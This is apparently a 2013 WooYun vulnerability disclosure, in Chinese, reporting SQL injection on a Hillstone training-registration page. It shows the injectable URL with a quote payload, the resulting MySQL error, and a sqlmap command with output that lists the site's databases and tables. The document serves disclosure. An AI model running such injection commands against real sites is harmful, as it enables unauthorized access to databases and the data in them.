hillstone网站SQL注入漏洞一枚 | wooyun-2013-037392

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2013-037392

漏洞标题：

hillstone网站SQL注入漏洞一枚

漏洞详情

披露状态：

2013-09-17：积极联系厂商并且等待厂商认领中，细节不对外公开
2013-11-01：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

hillstone网站SQL注入漏洞一枚

详细说明：

http://www.hillstonenet.com.cn/training/registration.php?id=314%27

MySQL Query:SELECT * FROM hillstonenet_training_course WHERE `id` = 314\'
MySQL Error:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
MySQL Errno:1064
Message:MySQL Query Error

[16:21:04] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5
web application technology: Apache 2.2.3, PHP 5.2.17
back-end DBMS: MySQL 5.0
[16:21:04] [INFO] fetching database names
[16:21:04] [INFO] the SQL query used returns 3 entries
[16:21:04] [INFO] resumed: information_schema
[16:21:04] [INFO] resumed: hillstonenet
[16:21:04] [INFO] resumed: test
available databases [3]:
[*] hillstonenet
[*] information_schema
[*] test

漏洞证明：

D:\python2.7\sqlmap>sqlmap.py -u http://www.hillstonenet.com.cn/training/registr
ation.php?id=314 -D hillstonenet --tables

[16:22:10] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5
web application technology: Apache 2.2.3, PHP 5.2.17
back-end DBMS: MySQL 5.0
[16:22:10] [INFO] fetching tables for database: 'hillstonenet'
[16:22:10] [INFO] the SQL query used returns 139 entries
[16:22:11] [WARNING] reflective value(s) found and filtering out
[16:22:11] [INFO] retrieved: hillstone_jy_sjbb

WooYun.org

漏洞概要关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 piaox@乌云

漏洞回应

厂商回应：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 piaox@乌云

漏洞回应

厂商回应：

漏洞概要关注数(24) 关注此漏洞